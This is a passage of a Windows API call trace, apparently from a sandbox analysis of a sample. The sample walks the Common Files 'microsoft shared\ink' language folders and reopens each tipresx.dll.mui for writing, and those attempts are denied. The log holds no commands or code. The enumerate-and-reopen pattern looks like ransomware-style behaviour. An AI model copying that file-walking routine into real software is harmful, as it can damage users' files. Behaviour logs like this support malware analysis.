Flags=0x0, Size=0x14) returned 0x34fb0 [0099.752] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0099.752] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0099.752] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0099.752] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351d0 [0099.752] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0099.752] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351d0 | out: hHeap=0x20000) returned 1 [0099.752] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.752] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0099.752] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.752] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0099.752] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0099.752] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.752] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c458 [0099.752] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0099.752] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.752] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.752] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.752] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.752] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c458 | out: hHeap=0x20000) returned 1 [0099.752] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.752] AreFileApisANSI () returned 1 [0099.752] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0099.752] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0099.752] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.752] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.752] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0099.752] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0099.752] AreFileApisANSI () returned 1 [0099.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0099.752] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85440 [0099.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x85440, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\tipresx.dll.mui") returned 73 [0099.753] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hr-hr\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0099.753] GetFileType (hFile=0x418) returned 0x1 [0099.753] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85440 | out: hHeap=0x20000) returned 1 [0099.753] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.753] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.753] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.753] CloseHandle (hObject=0x418) returned 1 [0099.754] AreFileApisANSI () returned 1 [0099.754] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0099.754] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85b20 [0099.754] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x85b20, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\tipresx.dll.mui") returned 73 [0099.754] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hr-hr\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.754] GetLastError () returned 0x5 [0099.754] GetLastError () returned 0x5 [0099.754] SetLastError (dwErrCode=0x5) [0099.754] GetLastError () returned 0x5 [0099.754] SetLastError (dwErrCode=0x5) [0099.754] GetLastError () returned 0x5 [0099.754] SetLastError (dwErrCode=0x5) [0099.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85b20 | out: hHeap=0x20000) returned 1 [0099.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0099.754] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.754] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.754] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x8c5b0, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧⠀")) returned 0 [0099.754] FindClose (in: hFindFile=0x78690 | out: hFindFile=0x78690) returned 1 [0099.754] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.754] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0099.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0099.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0099.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0099.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0099.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0099.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x464a8 | out: hHeap=0x20000) returned 1 [0099.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0099.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351d0 [0099.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0099.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351d0 | out: hHeap=0x20000) returned 1 [0099.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0099.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0099.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0099.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0099.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0099.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e718 [0099.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0099.755] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.755] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.755] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.755] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0099.755] AreFileApisANSI () returned 1 [0099.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU", lpUsedDefaultChar=0x0) returned 57 [0099.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0099.755] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.755] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0099.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0099.755] AreFileApisANSI () returned 1 [0099.756] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0099.756] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0099.756] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU") returned 57 [0099.756] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hu-hu"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.756] GetLastError () returned 0x5 [0099.756] GetLastError () returned 0x5 [0099.756] SetLastError (dwErrCode=0x5) [0099.756] GetLastError () returned 0x5 [0099.756] SetLastError (dwErrCode=0x5) [0099.756] GetLastError () returned 0x5 [0099.756] SetLastError (dwErrCode=0x5) [0099.756] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0099.756] AreFileApisANSI () returned 1 [0099.756] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0099.756] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69db0 [0099.756] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU") returned 57 [0099.756] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hu-hu"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.756] GetLastError () returned 0x5 [0099.756] GetLastError () returned 0x5 [0099.756] SetLastError (dwErrCode=0x5) [0099.756] GetLastError () returned 0x5 [0099.756] SetLastError (dwErrCode=0x5) [0099.757] GetLastError () returned 0x5 [0099.757] SetLastError (dwErrCode=0x5) [0099.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0099.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0099.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0099.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0099.757] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.757] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.757] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.757] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0099.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fe78 [0099.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0099.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e4f8 [0099.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fe78 | out: hHeap=0x20000) returned 1 [0099.757] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c8ce781, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe382bd1f, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe382bd1f, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0xb620, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="hwrcommonlm.dat", cAlternateFileName="")) returned 1 [0099.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0099.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0099.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0099.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35250 [0099.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0099.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6de98 [0099.757] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78010 [0099.758] FindNextFileW (in: hFindFile=0x78010, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06d0656, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0099.758] FindNextFileW (in: hFindFile=0x78010, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c3a52f7, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3c3a52f7, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3c3a52f7, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0099.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0099.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ecf0 [0099.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46048 [0099.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0099.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0099.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0099.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0099.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0099.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0099.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0099.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0099.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0099.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0099.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0099.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cce0 [0099.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0099.758] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.758] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.758] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.758] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cce0 | out: hHeap=0x20000) returned 1 [0099.759] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0099.759] AreFileApisANSI () returned 1 [0099.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0099.759] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0099.759] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.759] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.759] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0099.759] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0099.759] AreFileApisANSI () returned 1 [0099.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0099.759] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x856c0 [0099.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x856c0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\tipresx.dll.mui") returned 73 [0099.759] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hu-hu\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0099.759] GetFileType (hFile=0x418) returned 0x1 [0099.759] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x856c0 | out: hHeap=0x20000) returned 1 [0099.759] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.760] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.760] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.760] CloseHandle (hObject=0x418) returned 1 [0099.760] AreFileApisANSI () returned 1 [0099.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0099.760] RtlAllocateHeap 